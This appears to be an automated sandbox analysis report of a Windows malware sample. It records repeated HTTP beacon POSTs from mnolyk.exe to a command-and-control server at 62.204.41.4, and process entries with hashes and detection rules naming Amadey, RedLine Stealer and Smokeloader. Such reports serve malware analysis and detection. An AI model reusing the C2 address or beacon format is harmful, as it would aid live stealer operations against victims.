                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      87192.168.2.74978262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:24.432492018 CET202OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:24.495655060 CET202INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      88192.168.2.74978362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:24.676198006 CET203OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:24.739541054 CET203INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      89192.168.2.74978462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:24.915414095 CET204OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:24.980734110 CET204INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      9192.168.2.74970362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:03.736813068 CET113OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:03.801440954 CET113INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      90192.168.2.74978562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:25.161286116 CET205OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:25.226727962 CET | 205 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:25 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      91 | 192.168.2.7 | 49786 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:25.415635109 CET | 206 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:25.483971119 CET | 206 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:25 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      92 | 192.168.2.7 | 49787 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:25.659773111 CET | 207 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:25.722987890 CET | 207 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:25 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      93 | 192.168.2.7 | 49788 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:25.894311905 CET | 208 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:25.960613012 CET | 208 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:25 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      94 | 192.168.2.7 | 49789 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:26.125134945 CET | 209 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:26.188009024 CET | 209 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:26 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      95 | 192.168.2.7 | 49790 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:26.361222029 CET | 210 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:26.424854040 CET | 210 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:26 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      96 | 192.168.2.7 | 49791 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:26.598223925 CET | 211 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:26.663130999 CET | 211 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:26 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      97 | 192.168.2.7 | 49792 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:26.828356981 CET | 212 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:26.890578032 CET | 212 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:26 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      98 | 192.168.2.7 | 49793 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:27.063291073 CET | 213 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:27.125319004 CET | 213 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:27 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      99 | 192.168.2.7 | 49794 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:27.299792051 CET | 214 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:27.364953995 CET | 214 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:27 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0



                                                                      Target ID:0
                                                                      Start time:23:06:26
                                                                      Start date:07/02/2023
                                                                      Path:C:\Users\user\Desktop\file.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\Desktop\file.exe
                                                                      Imagebase:0x3d0000
                                                                      File size:538112 bytes
                                                                      MD5 hash:F4B906685385629998FAA352A94A2E1F
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000003.254673704.0000000004709000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:low

                                                                      Target ID:1
                                                                      Start time:23:06:26
                                                                      Start date:07/02/2023
                                                                      Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\bPsg.exe
                                                                      Imagebase:0xf30000
                                                                      File size:347136 bytes
                                                                      MD5 hash:F0D05D7896B3839E5CFBCC78E4FD87FF
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 55%, ReversingLabs
                                                                      Reputation:low

                                                                      Target ID:2
                                                                      Start time:23:06:27
                                                                      Start date:07/02/2023
                                                                      Path:C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\aPsf.exe
                                                                      Imagebase:0x400000
                                                                      File size:251904 bytes
                                                                      MD5 hash:5DD55AE0E5CCD8EF2E82679ED0FC11C9
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.292364966.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000002.00000002.292364966.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.292171350.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.292171350.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: ditekSHen
                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000002.00000002.292530050.00000000006F7000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000003.267977277.0000000000690000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000003.267977277.0000000000690000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 45%, ReversingLabs
                                                                      Reputation:low

                                                                      Target ID:3
                                                                      Start time:23:06:38
                                                                      Start date:07/02/2023
                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
                                                                      Imagebase:0x7ff61b080000
                                                                      File size:69632 bytes
                                                                      MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Target ID:7
                                                                      Start time:23:06:45
                                                                      Start date:07/02/2023
                                                                      Path:C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\nika.exe
                                                                      Imagebase:0xd40000
                                                                      File size:11264 bytes
                                                                      MD5 hash:7E93BACBBC33E6652E147E7FE07572A0
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 82%, ReversingLabs
                                                                      Reputation:moderate

                                                                      Target ID:9
                                                                      Start time:23:06:47
                                                                      Start date:07/02/2023
                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\
                                                                      Imagebase:0x7ff61b080000
                                                                      File size:69632 bytes
                                                                      MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Target ID:14
                                                                      Start time:23:06:57
                                                                      Start date:07/02/2023
                                                                      Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\xriv.exe
                                                                      Imagebase:0x1200000
                                                                      File size:241664 bytes
                                                                      MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 0000000E.00000000.319942123.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, Author: Joe Security
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 81%, ReversingLabs
                                                                      Reputation:moderate

                                                                      Target ID:15
                                                                      Start time:23:06:57
                                                                      Start date:07/02/2023
                                                                      Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe"
                                                                      Imagebase:0x1b0000
                                                                      File size:241664 bytes
                                                                      MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 0000000F.00000002.776200491.00000000001B1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 0000000F.00000000.321018621.00000000001B1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
